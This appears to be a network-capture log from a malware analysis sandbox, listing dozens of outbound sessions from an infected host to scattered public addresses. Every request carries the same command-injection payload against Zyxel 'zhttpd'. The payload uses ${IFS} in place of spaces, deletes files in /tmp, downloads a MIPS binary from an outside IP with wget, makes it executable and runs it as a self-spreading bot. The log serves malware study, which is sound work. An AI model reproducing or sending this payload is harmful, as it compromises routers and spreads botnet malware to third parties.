                                                      Feb 2, 2024 06:35:42.403464079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1837192.168.2.1456816162.227.43.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403492928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1838192.168.2.145818688.136.113.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403529882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1839192.168.2.144384463.103.58.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403582096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1840192.168.2.146008624.236.22.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403640985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1841192.168.2.1450682192.128.137.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403641939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1842192.168.2.145332066.60.235.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403692961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1843192.168.2.145826423.156.204.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403723955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1844192.168.2.1450580172.218.213.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403747082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1845192.168.2.143941889.92.198.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403790951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1846192.168.2.145829285.164.77.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403841019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1847192.168.2.1447848179.61.191.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403878927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1848192.168.2.1455880187.51.82.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403930902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1849192.168.2.144645858.71.6.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403979063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1850192.168.2.1434130206.131.5.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403985023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1851192.168.2.144487070.48.37.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404030085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1852192.168.2.145830465.6.44.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404082060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1853192.168.2.143537875.114.242.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404123068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1854192.168.2.1460648176.203.46.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404176950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1855192.168.2.1448914166.152.93.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404191017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1856192.168.2.1448724155.160.44.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404248953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1857192.168.2.1453332119.220.101.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404284000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1858192.168.2.143674866.131.28.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404345989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1859192.168.2.1433824207.207.201.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404381037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1860192.168.2.1450330192.10.26.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404424906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1861192.168.2.1441482180.11.157.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404462099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1862192.168.2.145576471.239.244.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404488087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1863192.168.2.1436602131.159.180.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404552937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1864192.168.2.1452188129.57.134.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404594898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1865192.168.2.1443022121.6.199.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404640913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1866192.168.2.1454952202.101.242.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404680014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1867192.168.2.1454080196.210.63.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404696941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1868192.168.2.143543490.104.124.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404781103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1869192.168.2.145096297.116.133.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404805899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1870192.168.2.143387854.63.169.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404820919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1871192.168.2.145405643.29.137.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404876947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1872192.168.2.143690242.241.221.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404917002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1873192.168.2.1449448111.251.215.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404956102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1874192.168.2.144886065.130.240.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.404994011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1875192.168.2.145644466.229.110.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405036926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1876192.168.2.1441550169.121.168.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405064106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1877192.168.2.1449786149.34.198.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405119896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1878192.168.2.1451330148.124.218.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405152082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1879192.168.2.1437390110.223.110.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405209064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1880192.168.2.1438080122.226.148.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405252934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1881192.168.2.1444308149.241.152.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405288935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1882192.168.2.1455396109.44.232.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405330896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1883192.168.2.1440940211.169.159.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405361891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1884192.168.2.145802670.245.179.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405411005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1885192.168.2.1453406168.255.199.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405436993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1886192.168.2.143375674.44.140.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405495882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1887192.168.2.144747450.186.206.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405525923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1888192.168.2.1444078106.94.136.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405559063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1889192.168.2.143441279.11.219.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405649900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1890192.168.2.144429041.55.56.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405685902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1891192.168.2.1459770125.121.209.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405716896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1892192.168.2.1449822179.44.96.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405742884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1893192.168.2.1438478126.95.204.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405786037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1894192.168.2.1441328133.151.194.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405833960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1895192.168.2.1448848162.216.100.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405872107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1896192.168.2.1443318136.91.174.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405915976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1897192.168.2.144455653.245.113.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405962944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1898192.168.2.145189266.26.10.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.405987978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1899192.168.2.145773246.9.139.164443
                                                      TimestampBytes transferredDirectionData
